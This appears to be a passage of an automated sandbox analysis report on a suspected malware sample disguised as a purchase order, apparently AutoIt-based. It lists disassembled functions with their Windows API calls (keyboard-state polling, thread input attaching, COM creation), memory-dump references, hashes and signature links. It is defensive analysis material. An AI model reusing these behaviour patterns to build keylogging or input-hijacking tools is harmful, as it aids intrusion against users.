                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                  • API String ID: 600699880-22481851
                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                  Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285
                                  • String ID: static
                                  • API String ID: 3433674075-2160076837
                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                  Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DriveType
                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                  • API String ID: 2907320926-3566645568
                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                  Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166timeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                  • 6FDA0860.COMCTL32(?), ref: 004709AD
                                  • 6FDA0860.COMCTL32(?), ref: 004709C5
                                  • 6FDA0860.COMCTL32(?), ref: 004709D5
                                  • DeleteObject.GDI32(003D0000), ref: 00470A04
                                  • DestroyCursor.USER32(003A0043), ref: 00470A1C
                                  • DeleteObject.GDI32(00660000), ref: 00470A34
                                  • 74285CF0.USER32(00650064), ref: 00470A4C
                                  • DestroyCursor.USER32(?), ref: 00470A73
                                  • DestroyCursor.USER32(?), ref: 00470A81
                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Destroy$A0860Cursor$DeleteObject$74285AcceleratorInvalidateKillRectTableTimer
                                  • String ID:
                                  • API String ID: 3592287921-0
                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                  Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: InitVariant$_malloc_wcscpy_wcslen
                                  • String ID:
                                  • API String ID: 3413494760-0
                                  • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                  • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                  Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 2634073740-771828931
                                  • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32 ref: 0046C63A
                                  • CoUninitialize.OLE32 ref: 0046C645
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                  • API String ID: 2294789929-1287834457
                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                  Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                  • _wcslen.LIBCMT ref: 00450720
                                  • _wcscat.LIBCMT ref: 00450733
                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window_wcscat_wcslen
                                  • String ID: -----$SysListView32
                                  • API String ID: 4008455318-3975388722
                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                  Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                  • GetParent.USER32 ref: 00469C98
                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                  • GetParent.USER32 ref: 00469CBC
                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 2360848162-1403004172
                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                  Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                  • String ID:
                                  • API String ID: 262282135-0
                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                  Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • 742845F0.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000), ref: 004481CF
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$742845
                                  • String ID:
                                  • API String ID: 1730662999-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                  Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
